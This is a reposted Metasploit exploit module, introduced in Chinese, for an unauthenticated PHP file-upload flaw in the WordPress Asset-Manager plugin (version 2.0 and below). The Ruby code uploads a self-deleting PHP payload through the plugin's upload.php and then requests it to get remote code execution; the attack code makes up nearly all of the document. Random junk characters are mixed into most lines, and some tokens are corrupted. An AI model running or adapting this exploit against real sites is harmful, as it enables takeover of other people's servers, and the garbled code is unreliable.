这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
+ O2 q! c; S; X$ U0 f
: ^! S0 n# _: P' ?##
% @0 b7 D3 J: [) Z) F/ |' F- k5 n# This file is part of the Metasploit Framework and may be subject to* J; ~7 k9 K1 B; ]" w
# redistribution and commercial restrictions. Please see the Metasploit
- y3 j+ y' i8 L: A0 I) S# Framework web site for more information on licensing and terms of use.1 S6 g2 @! N2 F, h1 J# y, a
# http://metasploit.com/framework/! z8 ~) E5 y5 g" y0 O5 f
##4 t7 p3 \, d2 I* F
$ F$ G9 b$ u& n3 p/ X; {% K
require 'msf/core'# O) `) s' Z& h- p$ P; X- W' _
require 'msf/core/exploit/php_exe'
* L9 _. M' `, F- Z
& r( I) x% p6 b4 W& G- ~3 |' Fclass Metasploit3 < Msf::Exploit::Remote
' G5 d4 Y7 G* q' Y# G: H3 g Rank = ExcellentRanking
" G/ E* w; ?9 b5 [+ A : U/ K8 l7 z% K2 p5 c; m3 ~7 B& U
include Msf::Exploit::Remote::HttpClient$ w9 g, G, q, ^$ a
include Msf::Exploit: hpEXE
5 L7 `7 D7 j. \5 z% T# j ' R- M4 X+ k2 L3 ^! {0 x
def initialize(info = {})
0 D3 i9 J2 ]: w super(update_info(info,, Q3 y* g% g( c, O- [
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',4 L" r# `3 A4 K" F7 @7 o) t! s
'Description' => %q{
1 S0 |' f0 n6 M9 n* P This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
$ L4 O, T. Z1 M3 R H1 t$ p9 w5 I plugin. By abusing the upload.php file, a malicious user can upload a file to a
6 m0 k6 O/ Q! [2 U( U4 u temp directory without authentication, which results in arbitrary code execution.9 T" ?/ L; i" B1 r% e
},
3 {/ B5 M# z2 y$ E 'Author' =>+ F! w7 a* J. O" A& f
[5 ]% G7 Z; [& W! C. M
'Sammy FORGIT', # initial discovery$ q1 l# ]/ O/ l) L6 d$ @
'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ D9 w& S, s5 ~. {
],2 E/ |$ g0 Z: A: Y( H+ a
'License' => MSF_LICENSE,% w3 ^& H% e w% ^
'References' =>- V8 Q' |5 w5 f( f4 s3 H* e
[
8 A. g, x7 e$ I. A- |8 ^3 w" L [ 'OSVDB', '82653' ],4 j: a3 C3 c, n, C& Y( O5 M3 s
[ 'BID', '53809' ],; V$ t: W2 i% S; K
[ 'EDB', '18993' ],
2 |* B# ?7 V+ B w [ 'URL', 'http:// www.myhack58.com /' ]: r4 y3 a3 J* V8 L" R9 F5 d
],2 H* _6 e" u# j7 ^& u, }& |
'Payload' =>5 k' b9 w' R' n( n1 F4 Y9 A- E
{
7 p' W* y5 G' z# e 'BadChars' => "\x00",% L0 ?; q: N2 [/ c' B H5 r
},
1 |1 A1 }4 H* F5 y2 @ 'Platform' => 'php',# x& ^ \+ m* ?0 L
'Arch' => ARCH_PHP,
* X9 A* @ I6 J- e8 E" e 'Targets' =>
6 B3 w7 _" K) d7 T [, T# g( m3 P0 c7 U
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],8 f! x S* T C B3 J+ ]: B! E
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
: ~: t- s |* M }/ {; J$ f6 l ],
* n4 l' h, `3 E, h% J 'DefaultTarget' => 0,
7 R! h5 u6 `; O5 P) q$ R' l+ Z: w9 U 'DisclosureDate' => 'May 26 2012'))
~- f/ ?) u" {5 Y
9 ~9 H+ h3 e" ?: s- j register_options(
+ ^/ S& \8 j# Z1 @ [
5 m1 z3 V: n" D* s5 v) j4 D( I OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
2 v2 _1 t: W: K: C! F ], self.class)1 X5 w& z& H# s5 }; V7 a
end. j; m+ K8 Z5 A* U( y, [) ], ?2 s
" }+ P( ` D0 ^' Y0 }; g6 z
def exploit% d& {8 {" U- c( I0 F- e+ {
uri = target_uri.path
! ~& b; M; [. { uri << '/' if uri[-1,1] != '/'
5 k6 R1 h, ]) H) h* u+ @- s peer = "#{rhost}:#{rport}"5 R/ K0 M, Z7 o
payload_name = "#{rand_text_alpha(5)}.php"- y5 t4 u" ?2 [& _
php_payload = get_write_exec_payload(:unlink_self=>true)7 z3 Q9 R9 K3 `2 Y
/ E* F% T: w; u/ C: B- H
data = Rex::MIME::Message.new
, `2 b( T5 @7 g data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")/ k" ?5 e9 {; a' _9 C2 H5 t
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' {! Q7 E4 O" a' Z
' p, K. ?$ A ] B o. ~8 N5 V" x
print_status("#{peer} - Uploading payload #{payload_name}")
- x4 m) Z' a. y6 Z: x2 X, I res = send_request_cgi({
8 {7 F! G/ e& r+ {* e' g 'method' => 'POST',+ A4 G$ K" M6 n2 G' g. e1 H
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
% e# G9 K, r# f; F6 i& t 'ctype' => "multipart/form-data; boundary=#{data.bound}",$ \* L) M# V' c7 {4 X
'data' => post_data
3 e4 V: f: w# b" i })- Q: {3 w1 `7 G0 \, ?4 r( b
& X! m$ ]5 Y# U if not res or res.code != 200 or res.body !~ /#{payload_name}/
! C2 E8 X' ]: K fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
2 @: L3 C' z3 Q* |: S+ b/ A7 ^$ p' Q' }end! B1 K! h1 Y% d! j& `2 p
; @& ? {' C, w: z$ U print_status("#{peer} - Executing payload #{payload_name}")
* L8 w7 @/ o9 t5 O1 F res = send_request_raw({ S% p% P; ~" N* M8 a# y8 T' M
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",1 B" n% E1 x* z9 ~- `. |* f' E
'method' => 'GET'
5 F5 I6 g0 t6 A V0 ?7 H })
* w Z$ y S3 l+ h5 I8 ` - `/ x1 ^# U' i. K# O
if res and res.code != 2009 _7 |. m) W* d8 H: ]5 G' X
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
, K$ [ O0 O5 L9 q+ q+ `9 }; q p end) Y* z2 g6 A, i3 z7 k& ?% e
end
9 O- S2 D9 m3 _* `- h- }6 |4 l, Vend; c# c0 Y) v2 U2 X3 j! x% j
|